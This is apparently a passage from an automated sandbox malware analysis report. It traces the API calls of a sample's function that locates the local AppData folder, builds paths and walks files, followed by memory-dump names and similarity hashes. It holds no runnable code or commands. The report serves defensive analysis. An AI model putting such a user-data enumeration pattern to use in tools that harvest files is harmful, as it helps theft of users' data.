                      • Part of subcall function 00488DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00488E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 00484F7A
                    • lstrcat.KERNEL32(?,00491070), ref: 00484F97
                    • lstrcat.KERNEL32(?,01238F70), ref: 00484FAB
                    • lstrcat.KERNEL32(?,00491074), ref: 00484FBD
                      • Part of subcall function 00484910: wsprintfA.USER32 ref: 0048492C
                      • Part of subcall function 00484910: FindFirstFileA.KERNEL32(?,?), ref: 00484943
                      • Part of subcall function 00484910: StrCmpCA.SHLWAPI(?,00490FDC), ref: 00484971
                      • Part of subcall function 00484910: StrCmpCA.SHLWAPI(?,00490FE0), ref: 00484987
                      • Part of subcall function 00484910: FindNextFileA.KERNEL32(000000FF,?), ref: 00484B7D
                      • Part of subcall function 00484910: FindClose.KERNEL32(000000FF), ref: 00484B92
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                    • String ID:
                    • API String ID: 2667927680-0
                    • Opcode ID: 29fd3ab160b7b12c7c91759a694fae5c16b6b70a5008afa9100ff35da5909b7f
                    • Instruction ID: a0b9ad99205540e9752abc56d170f53deb8b1724c8429163fc184b54aa626bba
                    • Opcode Fuzzy Hash: 29fd3ab160b7b12c7c91759a694fae5c16b6b70a5008afa9100ff35da5909b7f
                    • Instruction Fuzzy Hash: 1521DDF69002046BCB54F7B0DC46FED337DA794300F40469EB64992191EE7997C88BA6